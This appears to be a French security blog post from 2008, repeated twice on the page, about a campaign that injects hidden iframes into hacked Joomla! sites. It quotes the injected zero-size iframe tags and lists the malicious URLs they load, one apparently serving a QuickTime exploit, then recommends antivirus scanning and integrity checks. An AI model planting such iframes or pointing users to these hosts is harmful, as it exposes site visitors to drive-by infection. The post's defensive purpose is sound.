17 octobre 2008
5
17
/10
/octobre
/2008
01:19
Décidément, les cibles des attaques informatiques se diversifient de plus en plus, pour toucher des environnements ou des outils qu'on se soupçonnerait pas d'être visés...
Voici quelques éléments, concernant ce qui semble être une attaque visant Joomla! .
Au passage, un organisme spécialisé dans la veille virale m'a confirmé des attaques en cours contre Joomla!.
L'attaque semble consister à insérer une ou plusieurs balises iFrame dans le code du site piraté.
Ces balises pointent sur (entre autres) :
- http://wsx2host.net/count.php?o=
- http://pinoc.org/exploits/x7b.php
- msn-analytics.net/count.php?o=2
La recherche Google d'un de ces liens "malins" paraît également intéressante, et tend à montrer une réelle campagne d'attaque en cours :
http://www.google.fr/search?q=msn-analytics.net&btnG=Rechercher&hl=fr&rlz=1C1GGLS_frFR291&sa=2
On peut voir des administrateurs / webmasters qui ne comprennent pas ce qui arrive à leur site... et c'est souvent les utilisateurs qui leur signalent la présence du lien dangereux dans le code de leurs pages.
Les administrateurs suppriment le code malin, mais celui-ci revient souvent.
Exemple de balises iFrames injectées sur des sites (avec Joomla!) vulnérables :
iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe><?iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe>
On pourra noter la ressemblance entre : google-analytics.com et ... msn-analytics.net !!
Est-ce volontaire ? le nom de cette balise est-il conçu ainsi pour sembler "inoffensif" à première vue ?
On peut se poser la question.
D'ailleurs, les équipes de MSN pourraient attaquer le propriétaire de ce site (msn-analytics.net), car "msn" est une marque déposée... et il semble que Google pourrait également attaquer sur le terme "analytics" :
http://www.google.com/analytics/tos.html
Lequel des 2 est visé réellement, mystère... peut-être les 2 ?
Détails concernant msn-analytics.net :
Avertissement de sécurité :
http://safeweb.norton.com/report/show?url=msn-analytics.net
Le WhoIs sur le site de la CNIL ne semble pas donner de réponse probante pour ce domaine. Heureusement, d'autres WhoIs semblent eux le connaitre :
http://www.whois.net/whois_new.cgi?d=msn-analytics&tld=net
On pourra noter que la date d'enregistrement du domaine est très récente, il semble donc qu'on ait affaire à une campagne également récente...
Mise à jour du 30/10/08 :
Des tests montrent que l'exploit tenté par le site "msn analytics", tout comme les 2 autres visiblement, concerne une vulnérabilité sur QuickTime.
La dernière version (7.5.5) en date de QuickTime ne s'est pas révélée vulnérable lors de la navigation sur le site.
De même, la version 7.2 ne s'est pas montrée vulnérable, tout comme la 7.1.6.
Je n'ai pas eu le temps de faire des tests avec les versions 6...
Cependant, on peut se poser les questions suivantes : s'agit-il d'une erreur dans la mise en place de l'exploitation de faille, peut-être que les éléments d'attaque ne sont pas tous opérationnels ? ou s'agit-il réellement de l'utilisation d'une ancienne faille (ce qui semble étonnant vu la récence de la campagne d'attaque des Joomla...).
Bref, encore une raison de :
- scanner les flux HTTP au niveau antiviral (passerelles ou postes, selon l'architecture)
- scanner en local les pages d'un serveur Web, ne serait-ce que de nuit (dans un Cron par exemple et avec un ClamAV... pour Unix / Linux). On peut également envisager simplement un contrôle d'intégrité de ces pages...
- ne pas cliquer sur tout lien dès l'instant qu'il contient 1 mot clé "connu" (type "msn")....
Voici quelques éléments, concernant ce qui semble être une attaque visant Joomla! .
Au passage, un organisme spécialisé dans la veille virale m'a confirmé des attaques en cours contre Joomla!.
L'attaque semble consister à insérer une ou plusieurs balises iFrame dans le code du site piraté.
Ces balises pointent sur (entre autres) :
- http://wsx2host.net/count.php?o=
- http://pinoc.org/exploits/x7b.php
- msn-analytics.net/count.php?o=2
La recherche Google d'un de ces liens "malins" paraît également intéressante, et tend à montrer une réelle campagne d'attaque en cours :
http://www.google.fr/search?q=msn-analytics.net&btnG=Rechercher&hl=fr&rlz=1C1GGLS_frFR291&sa=2
On peut voir des administrateurs / webmasters qui ne comprennent pas ce qui arrive à leur site... et c'est souvent les utilisateurs qui leur signalent la présence du lien dangereux dans le code de leurs pages.
Les administrateurs suppriment le code malin, mais celui-ci revient souvent.
Exemple de balises iFrames injectées sur des sites (avec Joomla!) vulnérables :
iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe><?iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe>
On pourra noter la ressemblance entre : google-analytics.com et ... msn-analytics.net !!
Est-ce volontaire ? le nom de cette balise est-il conçu ainsi pour sembler "inoffensif" à première vue ?
On peut se poser la question.
D'ailleurs, les équipes de MSN pourraient attaquer le propriétaire de ce site (msn-analytics.net), car "msn" est une marque déposée... et il semble que Google pourrait également attaquer sur le terme "analytics" :
http://www.google.com/analytics/tos.html
Lequel des 2 est visé réellement, mystère... peut-être les 2 ?
Détails concernant msn-analytics.net :
Avertissement de sécurité :
http://safeweb.norton.com/report/show?url=msn-analytics.net
Le WhoIs sur le site de la CNIL ne semble pas donner de réponse probante pour ce domaine. Heureusement, d'autres WhoIs semblent eux le connaitre :
http://www.whois.net/whois_new.cgi?d=msn-analytics&tld=net
On pourra noter que la date d'enregistrement du domaine est très récente, il semble donc qu'on ait affaire à une campagne également récente...
Mise à jour du 30/10/08 :
Des tests montrent que l'exploit tenté par le site "msn analytics", tout comme les 2 autres visiblement, concerne une vulnérabilité sur QuickTime.
La dernière version (7.5.5) en date de QuickTime ne s'est pas révélée vulnérable lors de la navigation sur le site.
De même, la version 7.2 ne s'est pas montrée vulnérable, tout comme la 7.1.6.
Je n'ai pas eu le temps de faire des tests avec les versions 6...
Cependant, on peut se poser les questions suivantes : s'agit-il d'une erreur dans la mise en place de l'exploitation de faille, peut-être que les éléments d'attaque ne sont pas tous opérationnels ? ou s'agit-il réellement de l'utilisation d'une ancienne faille (ce qui semble étonnant vu la récence de la campagne d'attaque des Joomla...).
Bref, encore une raison de :
- scanner les flux HTTP au niveau antiviral (passerelles ou postes, selon l'architecture)
- scanner en local les pages d'un serveur Web, ne serait-ce que de nuit (dans un Cron par exemple et avec un ClamAV... pour Unix / Linux). On peut également envisager simplement un contrôle d'intégrité de ces pages...
- ne pas cliquer sur tout lien dès l'instant qu'il contient 1 mot clé "connu" (type "msn")....
Guillaume Laforge 29/10/2008 21:47
Philippe V. 30/10/2008 23:26